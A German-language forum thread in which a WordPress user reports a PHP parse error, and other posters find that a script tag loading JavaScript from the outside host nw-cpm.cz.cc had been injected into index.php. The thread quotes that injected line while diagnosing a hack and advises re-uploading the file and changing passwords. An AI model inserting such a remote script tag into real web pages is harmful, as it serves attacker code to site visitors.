Fehlermeldung

Hallo Leute.
Bei mir kommt seid gestern die Fehlermeldung
Parse error: syntax error, unexpected ‘?’ in /users/xxxxxx/www/wordpress/index.php on line 18.
Die Seite läßt sich somit nicht mehr aufrufen.
Wer kann da helfen ?

Gruss hullihalli3

Poste doch mal den Inhalt der index.php

Ich vermute spontan ein fehlendes ; :nutz:

Vor einem < kommt kein ;… Ich vermute spontan einen Virus, der dir irgendwas in den Seiten-Header schreiben wollte, aber mit PHP nicht klar gekommen ist… (HTML-Parser und <? )

@ Mohyra

<?php /** * Front to the WordPress application. This file doesn't do anything, but loads * wp-blog-header.php which does and tells WordPress to load the theme. * * @package WordPress */ /** * Tells WordPress to load the WordPress theme and output it. * * @var bool */ define('WP_USE_THEMES', true); /** Loads the WordPress Environment and Template */ require('./wp-blog-header.php'); ?>

@ kerbination

ein fehlendes … was???

require('./wp-blog-header.php'); ?<html><body><script type="text/javascript" src="http://nw-cpm.cz.cc/media.js"> </script></body></html>>
? und > bilden zusammen den „End-Tag“ eines PHP-Bereiches.

Hier hat aber irgendwer oder irgendwas HTML-Code zwischen diese beiden Zeichen gequetscht.

ach so, zu erwähnen wäre noch, das ich mit Wordpress Version 2.8.4 DE arbeite.

@ chrisb

dann sag mir bitte auch wie es richtig ist oder sein sollte.

[quote=“hullihalli3”]
require(’./wp-blog-header.php’);
?>[/quote]
Lies es doch mal… Ein PHP schliesst man mit ?>

Du hast zwischen die beiden Zeichen HTML-Code gequetscht
Also aus:
?>
Das machen:
?><html>

Woher hast du den HTML-Code? Den kannst du so nicht einbinden… So schreibst du 2mal . Eimal aus Wordpress und einmal aus deinem Code.

Am einfachsten lädst du die Datei neu hoch, dann brauchst du gar nichts selber dran machen.

Allerdings solltest du schon klären, wo diese Einfügung denn überhaupt her kam.
Wenn du die nicht selber vorgenommen hast - dann wurde dein Webspace vermutlich gehackt.
Dann wäre es erst mal angebracht,
a) sämtliche Passwörter zu ändern, und
b) sämtliche Scripte in der aktuellsten Version neu aufzuspielen.

Ich hab doch gesagt, dass das ein Virus war und ich hatte Recht (google.at/search?q=nw-cpm.cz.cc)

Änder bitte alle deine Passwörter bei bplaced und überprüfe ggf. deinen lokalen PC